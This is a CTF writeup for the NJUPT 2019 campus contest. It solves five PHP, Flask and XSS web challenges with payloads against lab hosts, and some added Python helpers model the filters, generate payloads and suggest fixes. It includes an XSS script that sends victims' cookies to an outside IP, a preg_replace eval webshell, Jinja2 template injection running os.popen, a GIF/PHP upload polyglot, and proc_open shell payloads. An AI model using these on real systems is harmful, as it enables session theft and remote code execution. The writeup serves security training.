NJUPT2019 campus CTF (南邮校赛) writeup

easyphp

<?php
error_reporting(0);
highlight_file(__file__);
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];
$cmd = $_GET['q_w_q'];


//1st
if($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])){
    echo '1st ok'."<br>";
}
else{
    die('23333333');
}


//2nd
if(is_numeric($string_1)){
    $md5_1 = md5($string_1);
    $md5_2 = md5($string_2);
    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'cxhp', '0123');
        $b = strtr($md5_2, 'cxhp', '0123');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    }
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}


//3rd
$query = $_SERVER['QUERY_STRING'];
if (strlen($cmd) > 8){
    die("too long :(");
}

if( substr_count($query, '_') === 0 && substr_count($query, '%5f') === 0 ){
    $arr = explode(' ', $cmd);
    if($arr[0] !== 'ls' || $arr[0] !== 'pwd'){
        if(substr_count($cmd, 'cat') === 0){
            system($cmd);
        }
        else{
            die('ban cat :) ');
        }
    }
    else{
        die('bad guy!');
    }
}
else{
    die('nonono _ is bad');
}
?>

Layer 1: append a newline to num. Without the D modifier, the $ in /^23333$/ also matches just before one final "\n", so "23333\n" satisfies preg_match() while the strict comparison !== '23333' is true for it. (Two trailing newlines do not work; $ only tolerates one.)

Layer 2: str1 must be numeric, md5(str1) must not loosely equal md5(str2), and yet after strtr() the two digests must loosely compare equal. Hex digests never contain x, h or p, so strtr() effectively only turns c into 0: a digest of the form ce<digits> becomes 0e<digits>, which PHP's == treats as the number 0. So we need a numeric str1 whose md5 starts with ce and continues with digits only (c's would also do, since they become 0 as well), and a str2 whose md5 is already a 0e... magic hash, such as 240610708 (md5 0e462097431906509019562988736854). Before strtr() the ce... digest is not a numeric string, so the != compares as strings and passes. Finding such a str1 took a long brute force.

Layer 3: the query string may not contain _ or %5f, but PHP rewrites spaces (and dots) in parameter names to underscores, so sending the parameter as q+w+q (+ decodes to a space) populates $_GET['q_w_q']. substr_count() is case-sensitive, so q%5Fw%5Fq would get through as well. The command is capped at 8 characters and may not contain cat; nl *.php is exactly 8 characters and prints the PHP sources with line numbers. The condition $arr[0] !== 'ls' || $arr[0] !== 'pwd' is always true, so that branch blocks nothing.

The script:

import requests

# q+w+q in the parameter name becomes $_GET['q_w_q'] on the server (space -> underscore),
# so the query string itself never contains an underscore
url = 'http://nctf2019.x1ct34m.com:60005/?num={num}&str1={str1}&str2={str2}&q+w+q=nl *.php'
num = '23333\n'   # requests percent-encodes the newline as %0A

print(requests.get(url.format(num=num, str1='0507041381', str2='240610708')).text)
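To check each bypass before sending it, here is an offline model of the three checks. This is an added example and not code from the writeup; it reproduces only the PHP behaviour the bypasses depend on (PCRE $ matching before a final newline, loose == on numeric strings, the space/dot to underscore rewrite of parameter names) and is not a general PHP emulator. The find_ce_numeric() search at the end is the brute force behind str1; the budget argument is there so it can be run in small slices.

```python
import hashlib
import re
from urllib.parse import unquote_plus

# Offline model of the three easyphp checks (added example, not part of the
# original writeup). Only the PHP behaviour the bypasses rely on is modelled.


def php_is_numeric(s):
    # Approximation of is_numeric() for strings; surrounding-whitespace rules omitted.
    return re.fullmatch(r'[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?', s) is not None


def php_loose_eq(a, b):
    # PHP == on two strings: both numeric -> compared as numbers,
    # which is why '0e462...' == '0e990...' (both are the float 0.0).
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) == float(b)
    return a == b


def strtr_cxhp(digest):
    # strtr($h, 'cxhp', '0123'); on a hex digest only the c -> 0 mapping ever fires.
    return digest.translate(str.maketrans('cxhp', '0123'))


def layer1(num):
    # Python's re '$' behaves like PCRE's here: it also matches before one trailing "\n".
    return num != '23333' and re.match(r'^23333$', num) is not None


def layer2(str1, str2):
    if not php_is_numeric(str1):
        return False
    m1 = hashlib.md5(str1.encode()).hexdigest()
    m2 = hashlib.md5(str2.encode()).hexdigest()
    if php_loose_eq(m1, m2):          # $md5_1 != $md5_2 must hold
        return False
    return php_loose_eq(strtr_cxhp(m1), strtr_cxhp(m2))


def php_param_name(raw):
    # PHP decodes the name, then turns spaces and dots into underscores.
    return unquote_plus(raw).lstrip(' ').replace(' ', '_').replace('.', '_')


def layer3(query):
    """Return the command that reaches system(), or None when a filter fires."""
    if '_' in query or '%5f' in query:      # case-sensitive, exactly like substr_count()
        return None
    params = {}
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        params[php_param_name(key)] = unquote_plus(value)
    cmd = params.get('q_w_q', '')
    if len(cmd) > 8:
        return None
    first = cmd.split(' ')[0]
    if not (first != 'ls' or first != 'pwd'):   # the original's always-true test, kept as is
        return None
    if 'cat' in cmd:
        return None
    return cmd


def is_ce_hash(s):
    # md5(s) turns into a numeric 0e... string after strtr_cxhp()
    return re.fullmatch(r'ce[0-9c]{30}', hashlib.md5(s.encode()).hexdigest()) is not None


def find_ce_numeric(start, budget):
    # The brute force behind str1: try `budget` consecutive integers from `start`.
    for n in range(start, start + budget):
        if is_ce_hash(str(n)):
            return str(n)
    return None


if __name__ == '__main__':
    print(layer1('23333\n'), layer2('0507041381', '240610708'))
    print(layer3('num=23333%0A&str1=0507041381&str2=240610708&q+w+q=nl+*.php'))
```

layer3() also shows the two things the PHP check misses: q%5Fw%5Fq passes because the %5f test is case-sensitive, and ls is allowed because the || condition can never be false.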

replace

POST /index.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40006
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://nctf2019.x1ct34m.com:40006/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Connection: close
Upgrade-Insecure-Requests: 1

sub=1234&pat=123&rep=eval($_POST[cmd])

The sub/pat/rep parameter names point at preg_replace() with the /e modifier, which evaluates the replacement as PHP; with eval($_POST[cmd]) as the replacement the page becomes a one-line webshell, which can then be driven with Caidao (China Chopper) or any similar client.

flask

The following template expression executes (the target runs Python 2, hence func_globals; subclass index 59 depends on the interpreter's import order, and the object at that position has __init__ globals that reach linecache and, through it, os):

{{[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('id').read()}}

Fuzzing showed the string flag is filtered, so read the file through a glob instead of naming it:

{{[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('cat ../*').read()}}

Upload your Shell

The upload page is http://nctf2019.x1ct34m.com:60002/index.php?action=imgs.html; the action parameter is the file the page includes.

Upload a gif file with this content (the GIF89a header satisfies the image check; <script language="php"> is the PHP 5 alternative open tag, which survives filters that only look for <?php and was removed in PHP 7):

GIF89a<script language="php">echo 123;</script>

The response gives away the stored path:

<h1>Success!</h1><h1>filepath:/var/www/html/upload-imgs/ce3d64bbda44d24bb25ad9bc0b24a621/Th1s_is_a_fl4g.jpg</h1>

Requesting http://nctf2019.x1ct34m.com:60002/index.php?action=/var/www/html/upload-imgs/ce3d64bbda44d24bb25ad9bc0b24a621/Th1s_is_a_fl4g.jpg includes the uploaded file and returns the flag.
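As an added example (not the challenge's handler, which the page does not show), a server-side upload check that rejects the polyglot above. The sample inputs are constructed: the GIF89a/PHP file from the writeup and a minimal GIF-shaped stub.

```python
import re

# Added example, not from the writeup: a generic upload validator.
# Constructed samples: the polyglot from the writeup, and a GIF-shaped stub.
SAMPLE_POLYGLOT = b'GIF89a<script language="php">echo 123;</script>'
CLEAN_GIF = b'GIF89a\x01\x00\x01\x00\x00\x00\x00;'

MAGIC = {
    'gif': (b'GIF87a', b'GIF89a'),
    'jpg': (b'\xff\xd8\xff',),
    'jpeg': (b'\xff\xd8\xff',),
    'png': (b'\x89PNG\r\n\x1a\n',),
}

PHP_OPEN_TAGS = [
    rb'<\?php\b',
    rb'<\?=',
    rb'<\?\s',                                       # short_open_tag
    rb'<script\s+language\s*=\s*["\']?php["\']?',    # PHP 5 alternative open tag, removed in PHP 7
]


def looks_like_image(data, ext):
    return any(data.startswith(m) for m in MAGIC.get(ext, ()))


def contains_php(data):
    # A magic-byte check alone passes the polyglot; the open tag is what matters.
    return any(re.search(p, data, re.IGNORECASE) for p in PHP_OPEN_TAGS)


def validate_upload(filename, data):
    """Return (accepted, reason): extension whitelist first, then content checks."""
    ext = filename.rsplit('.', 1)[-1].lower() if '.' in filename else ''
    if ext not in MAGIC:
        return False, 'extension not allowed'
    if contains_php(data):
        return False, 'php open tag inside image'
    if not looks_like_image(data, ext):
        return False, 'content does not match extension'
    return True, 'ok'


if __name__ == '__main__':
    print(validate_upload('Th1s_is_a_fl4g.jpg', SAMPLE_POLYGLOT))
    print(validate_upload('a.gif', CLEAN_GIF))
```

Even with this check in place the decisive mistake is elsewhere: the upload is stored under the web root at a predictable path and the action parameter will include() any path the client names. Store uploads outside the web root under a server-generated random name and never pass user input to include.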

simple_xss

You need a VPS with a public IP. Put 4.js on it and listen with nc -vlp 10006:

var image=new Image();
// note: there is no '?' before cookie=, so the cookies become part of the path; nc prints the raw request line either way
image.src="http://118.25.36.154:10006/cookies.phpcookie="+document.cookie;

Send the message to admin with the script tag as the content (insert is the URL-encoded text of the submit button, 提交查询):

POST /home.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://nctf2019.x1ct34m.com:40001/home.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Connection: close
Cookie: PHPSESSID=bj6lqis6j6ppsdjq6fv1oqm808; user=2195c28f04a206d7a8a37660d7ca25f5
Upgrade-Insecure-Requests: 1

to=admin&content=<script src=http://118.25.36.154/4.js></script>&insert=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

The listener then receives the admin bot's request (note the PhantomJS user agent):

Listening on [0.0.0.0] (family 0, port 10006)
Connection from [115.29.65.26] port 10006 [tcp/*] accepted (family 2, sport 43002)
GET /cookies.phpcookie=PHPSESSID=qm960h19dcds2h7guh1nk03qet;%20user=c6b93fa075336a55dc2ab6da03569e0b HTTP/1.1
Referer: http://139.129.76.65:40001/home.php
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: 118.25.36.154:10006

Now replace your own cookies with the captured ones and request home.php again to get the flag:

GET /home.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qm960h19dcds2h7guh1nk03qet; user=c6b93fa075336a55dc2ab6da03569e0b
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Sun, 24 Nov 2019 12:43:19 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 26
Connection: close
Content-Type: text/html; charset=utf-8

NCTF{Th1s_is_a_Simple_xss}
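The two ends of the cookie theft above, as an added example that is not part of the writeup: parsing the request line netcat printed (reproduced here as constructed sample input) into the Cookie header for the replay, and the Set-Cookie flags that would have kept document.cookie from exposing the session in the first place.

```python
from http.cookies import SimpleCookie
from urllib.parse import unquote

# Added example, not part of the original writeup. The request line below is
# the one netcat printed, reproduced as constructed sample input.
CAPTURED_REQUEST_LINE = (
    'GET /cookies.phpcookie=PHPSESSID=qm960h19dcds2h7guh1nk03qet;'
    '%20user=c6b93fa075336a55dc2ab6da03569e0b HTTP/1.1'
)


def cookies_from_beacon(request_line, marker='cookie='):
    """Pull the stolen cookies out of the beacon's request line."""
    _method, target, _version = request_line.split(' ', 2)
    # The beacon glued document.cookie onto the path without a '?', so split on
    # the marker instead of parsing a query string.
    raw = unquote(target.split(marker, 1)[1])
    jar = SimpleCookie()
    jar.load(raw)
    return {name: morsel.value for name, morsel in jar.items()}


def replay_cookie_header(cookies):
    # The header to paste into the GET /home.php replay.
    return 'Cookie: ' + '; '.join('%s=%s' % kv for kv in cookies.items())


def hardened_set_cookie(name, value, secure=True):
    # What the server should have sent: HttpOnly hides the cookie from
    # document.cookie, so this beacon would have exfiltrated nothing.
    flags = ['Path=/', 'HttpOnly', 'SameSite=Lax'] + (['Secure'] if secure else [])
    return 'Set-Cookie: %s=%s; %s' % (name, value, '; '.join(flags))


if __name__ == '__main__':
    stolen = cookies_from_beacon(CAPTURED_REQUEST_LINE)
    print(replay_cookie_header(stolen))
    print(hardened_set_cookie('PHPSESSID', 'example'))
```

HttpOnly closes this particular channel only; the stored XSS itself is fixed by HTML-encoding the message content when home.php renders it.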

hacker_backdoor

<?php
error_reporting(0);
if(!isset($_GET['code']) || !isset($_GET['useful'])){
    highlight_file(__file__);
}
$code = $_GET['code'];
$usrful = $_GET['useful'];

function waf($a){
    $dangerous = get_defined_functions();
    array_push($dangerous["internal"], 'eval', 'assert');
    foreach ($dangerous["internal"] as $bad) {
        if(strpos($a,$bad) !== FALSE){
            return False;
            break;
        }
    }
    return True;
}

if(file_exists($usrful)){
    if(waf($code)){
        eval($code);
    }
    else{
        die("oh,不能输入这些函数哦 :) ");
    }
}

String concatenation gets around this. file_exists() is easy to satisfy (any existing path such as /etc works for useful). waf() rejects the code if any internal function name occurs in it as a substring, so build the name one character at a time and call it through a variable function. First phpinfo():

$a='p'.'h'.'p'.'i'.'n'.'f'.'o';$a();


http://nctf2019.x1ct34m.com:60004/?useful=/etc&code=$a=%27p%27.%27h%27.%27p%27.%27i%27.%27n%27.%27f%27.%27o%27;$a();

disable_functions in the phpinfo() output lists the disabled functions:

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,system,shell_exec,popen,passthru,link,symlink,syslog,imap_open,ld,error_log,mail,assert,file_put_contents,scandir,file_get_contents,readfile,fread,fopen,chdir,unlink,delete

proc_open() is not disabled, and neither is glob, so first list the files under /:

$a='p'.'r'.'i'.'n'.'t'.'_'.'r';$s='g'.'l'.'o'.'b';$a($s('/*'));


http://nctf2019.x1ct34m.com:60004/?useful=/etc&code=$a=%27p%27.%27r%27.%27i%27.%27n%27.%27t%27.%27_%27.%27r%27;$s=%27g%27.%27l%27.%27o%27.%27b%27;$a($s(%27/*%27));

The flag file cannot be read directly; it has to be obtained by running /readflag, so use proc_open() to execute it and read the output (sh gets the command on its stdin pipe and the result comes back on the stdout pipe):

$w='f'.'w'.'r'.'i'.'t'.'e';$c='f'.'c'.'l'.'o'.'s'.'e';$p='p'.'r'.'o'.'c'.'_'.'o'.'p'.'e'.'n';$pp='p'.'i'.'p'.'e';$s='s'.'t'.'r'.'e'.'a'.'m'.'_'.'g'.'e'.'t'.'_'.'c'.'o'.'n'.'t'.'e'.'n'.'t'.'s';$descriptorspec=[[$pp,"r"],[$pp,"w"]];$process=$p('sh', $descriptorspec,$d);$w($d[0],'/readflag');$c($d[0]);print($s($d[1]));$c($d[1]);


http://nctf2019.x1ct34m.com:60004/?useful=/etc&code=$w=%27f%27.%27w%27.%27r%27.%27i%27.%27t%27.%27e%27;$c=%27f%27.%27c%27.%27l%27.%27o%27.%27s%27.%27e%27;$p=%27p%27.%27r%27.%27o%27.%27c%27.%27_%27.%27o%27.%27p%27.%27e%27.%27n%27;$pp=%27p%27.%27i%27.%27p%27.%27e%27;$s=%27s%27.%27t%27.%27r%27.%27e%27.%27a%27.%27m%27.%27_%27.%27g%27.%27e%27.%27t%27.%27_%27.%27c%27.%27o%27.%27n%27.%27t%27.%27e%27.%27n%27.%27t%27.%27s%27;$descriptorspec=[[$pp,%22r%22],[$pp,%22w%22]];$process=$p(%27sh%27,%20$descriptorspec,$d);$w($d[0],%27/readflag%27);$c($d[0]);print($s($d[1]));$c($d[1]);
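As an added example (not the writeup's own code), a model of waf() together with a generator for the single-character concatenation that slips past it. The real blacklist is the whole of get_defined_functions()["internal"]; INTERNAL_SAMPLE is a constructed subset that includes the short names (pi, dl, ord, pos) which make the substring check bite even on variable names.

```python
# Added example, not from the writeup: a model of waf() and a payload generator.
# INTERNAL_SAMPLE is a constructed subset of get_defined_functions()["internal"].
INTERNAL_SAMPLE = ['eval', 'assert', 'phpinfo', 'proc_open', 'fwrite', 'fclose',
                   'stream_get_contents', 'glob', 'print_r', 'pi', 'dl', 'ord', 'pos']


def waf(code, names=INTERNAL_SAMPLE):
    # strpos($code, $bad) !== FALSE for any name -> blocked (case-sensitive substring).
    return not any(name in code for name in names)


def php_str(name):
    # 'proc_open' -> 'p'.'r'.'o'.'c'.'_'.'o'.'p'.'e'.'n': no two characters of any
    # function name are adjacent in the source, so no substring can match.
    return '.'.join("'%s'" % ch for ch in name)


def phpinfo_payload():
    return "$a=%s;$a();" % php_str('phpinfo')


def glob_root_payload():
    return "$a=%s;$s=%s;$a($s('/*'));" % (php_str('print_r'), php_str('glob'))


def readflag_payload():
    # proc_open('sh') with a stdin/stdout pipe pair; '/readflag' is written to
    # stdin and the output read back. print is a language construct, not a
    # function, so it never appears in the blacklist.
    funcs = {'w': 'fwrite', 'c': 'fclose', 'p': 'proc_open', 'pp': 'pipe',
             's': 'stream_get_contents'}
    assigns = ''.join('$%s=%s;' % (var, php_str(name)) for var, name in funcs.items())
    body = ('$d=[[$pp,"r"],[$pp,"w"]];$r=$p(\'sh\',$d,$q);'
            "$w($q[0],'/readflag');$c($q[0]);print($s($q[1]));$c($q[1]);")
    return assigns + body


if __name__ == '__main__':
    for payload in (phpinfo_payload(), glob_root_payload(), readflag_payload()):
        print(waf(payload), payload)
```

The generator also explains why variable names have to be chosen with care: $pi or $pos would be rejected on the real list because those are internal functions. A substring blacklist in front of eval() cannot be made safe; the fix is to remove the eval().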

Author: xianyu123

Published: 2019-11-24 21:23

Last updated: 2020-08-25 22:42

Original link: http://0clickjacking0.github.io/2019/11/24/NJUPT2019南邮校赛/

License: CC BY-NC-ND 4.0 International. Keep the original link and author when reposting.